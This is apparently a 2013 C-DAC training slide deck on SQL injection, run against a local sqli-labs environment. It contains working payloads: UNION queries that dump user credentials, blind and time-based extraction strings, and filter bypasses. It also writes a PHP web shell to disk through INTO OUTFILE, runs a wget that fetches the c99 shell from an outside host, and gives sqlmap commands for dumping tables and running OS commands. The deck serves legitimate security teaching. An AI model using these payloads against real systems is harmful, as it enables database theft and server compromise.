Sqli Injection

#whoami

Ahamed Saleem @saleem14489#Security Researcher @CDAC

● What is Sql Injection

● Types of sql injection

– Error based Injection ( String, numeric, Union, error )

– Time based Blind SQLi

– Boolean based Blind SQLi

– Cookie based Injection

– Compromising Database server using SQLi (upload a shell)

– Exploitation using SQLmap

– Bypass filters to successfully exploit SQLi .

Agenda

Baa, baa, black hat

Have you any sploits?

Yes, sir, yes, sir

3 bulletproof choices

One for Java

One for IE

One for Chrome

(ha ha ha )

➔ Structured Query Language designed for managing data held in a relational database management systems (RDBMS).

➔ The scope of SQL includes data insert, update and delete, schema creation and modification, and data access control.

What Is Sql ?

Definition Of Sql InjectionDef :

“SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to affect the execution of predefined SQL commands”

Cause:

It is a flaw in “web application development “ , it is not a DB or web server problem

→ most programmers are still not aware of this problem → lot of solutions posted on the internet are not good

enough

Anatomy Of Sql Injection

Sql Injection

Error Based Blind Based

Boolean Based Time Based

© C-DAC, Hyderabad - 2013

SQL Injection – Illustrated

Firewall

Hardened OS

Web Server

App Server

Firewall

Database s

Legacy Syst em

s

Web S

er vices

Director ies

Hum

an Resr cs

Billing

Custom Code

APPLICATIONATTACK

Netw

ork Layer

Applicat ion L

ayer

Account s

Finance

Adm

inis tration

Transact ions

Com

municat ion

Know

led ge Mgm

t

E-C

omm

erce

Bus. Fun ctionsHTTP

requestSQL

query

DB Table

HTTP response

"SELECT * FROM accounts WHERE

acct=‘’ OR 1=1--’"

1. Application presents a form to the attacker

2. Attacker sends an attack in the form data

3. Application forwards attack to the database in a SQL query

Account Summary

Acct:5424-6066-2134-4334Acct:4128-7574-3921-0192Acct:5424-9383-2039-4029Acct:4128-0004-1234-0293

4. Database runs query containing attack and sends encrypted results back to application

5. Application decrypts data as normal and sends results to the user

Account:

SKU:

Account:

SKU:

OWASP Top 10

Myth

Escaping input Prevents Sql Injection

Sql Injection is an old problem - So I dont have to worry about it

Error Based Injections

Error-based SQL injections are primarily those

in which the SQL server dumps some errors

back to the user via the web application and

this error aids in successful exploitation

A methodological approach is always helpful in understanding the underlying logic. The major process is as follows:

1.Enumerate the application behavior

2.Fuzz the application with bogus data with the goal of crashing the application

3.Try to control the injection point by guessing the query used in the back-end

4. Extract the data from the back end database

Enough theory, time for some action.

Demo

● Id = 1' --+● id=1' AND 1=1 --+● id=1' union select 1,2,3 --+● id=999' union select 1,2,3 --+● id=-1' union select 1,table_name,3 from

information_schema.tables where table_schema=database() --+● id=-1' union select 1,group_concat(table_name),3 from

information_schema.tables where table_schema=database()--+● id=-1' union select 1,group_concat(column_name),3 from

information_schema.columns where table_name='users'--+● id=-1' union select 1,group_concat(username),

group_concat(password) from users --+

Blind Injections

Blind SQL injections are those injections in which the backend database reacts to the input, but somehow the errors are concealed by the web application and not displayed to the end users

Boolean Based :

The information must be inferred from the behavior of the page by asking the server true/false questions

Time Based :

Gain information by observing timing delays in the response of the database

Boolean Based Injections

select ascii(substr(database(),1,1));

id=1' AND (ascii(substr((select database()),3,1))) = 99 --+

id=1' AND (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)))=101 --+

Time based Injections

id=1' and if((select database()="security"), sleep(10),null) --+

id=1' and if ((select substr(table_name,1,1) from information_schema.tables where table_schema=database() limit 0,1 ) ='e' , sleep(10) , null)--+

Uploading shell

http://localhost/sqli-labs-master/Less-1/?id=-1' union select "","","<?system($_REQUEST['cmd'];?>"

into outfile '/var/www/shell.php' --+

http://localhost/shell.php?cmd=wget http://www.r57shell.net/shell/c99.txt

SqlMap detects and expolits SQLi flaws

Features :● Full support for MySQL, Oracle, PostgreSQL and Microsoft SQL Server

● Three SQL Injection techniques :● Boolean-based ● Union queries● Batched queries

● Perform an extensive back-end DBMS fingerprint

● Enumerate users, password hashes, privileges, databases, tables, columns and their data-type ● Dump entire or user specified database table entries ● Run custom SQL statements

SqlMap detects and expolits SQLi flaws

Dishum Dishum usingSQLMAP

– First detect the vulnerable URLS – Now use sqlmap :

1 . python sqlmap.py –u http://site.com/?id=1 {Identify sqli is present or not }

2 . python sqlmap.py -u http://site.com/?id=1 --dbs {Discover databases}

3./sqlmap -u http://site.com/?id=1 --tables -D <db name> {table in db}

4./sqlmap -u http://site.com/?id=1 --columns -D <db name> -T <table name>

5./sqlmap -u http://site.com/?id=1 --dump -D <db name> -T <table name>{data}

Uploading Shell Using SQLMap :

1. Check if the current user is DBA or not .

./sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1 --current-user –is-dba

2.now enter the webserver path

./sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1 --os-cmd -v 1

3. now the webshell can be loaded using the sqlmap file stager .

DEMO

ByPassing the blacklist Filters

Bypass AND and OR : Id=1' || 1=1 --+ id=1' %26%26 1=1 --+

Hands On

Methodology● Break it

– Try to break the query by fuzzing● Fix it

– Now based on the error try to balance and fix the query

© C-DAC, Hyderabad - 2013

✔ What is Sql Injection✔ Types of Sql Injection✔ Hands on

What did we cover?

© C-DAC, Hyderabad - 2013

* Websites and References

OWASP, WASC, MSDN

* Books and Mailing Lists

Web Application Hackers Handbook, OWASP Guides

* Tools to use

Burp, Paros, Firefox Extensions, Virtual Box, Linux

What did we cover?Further Roadmap

© C-DAC, Hyderabad - 2013

Acknowledge ● @Sqlilabs ● @Google● @Nullhyd● @cswan● @thenounproject

© C-DAC, Hyderabad - 2013

Thank U

@saleem14489 Facebook.com/ahamedssaleem

Saleem4u.ahamed@gmail.com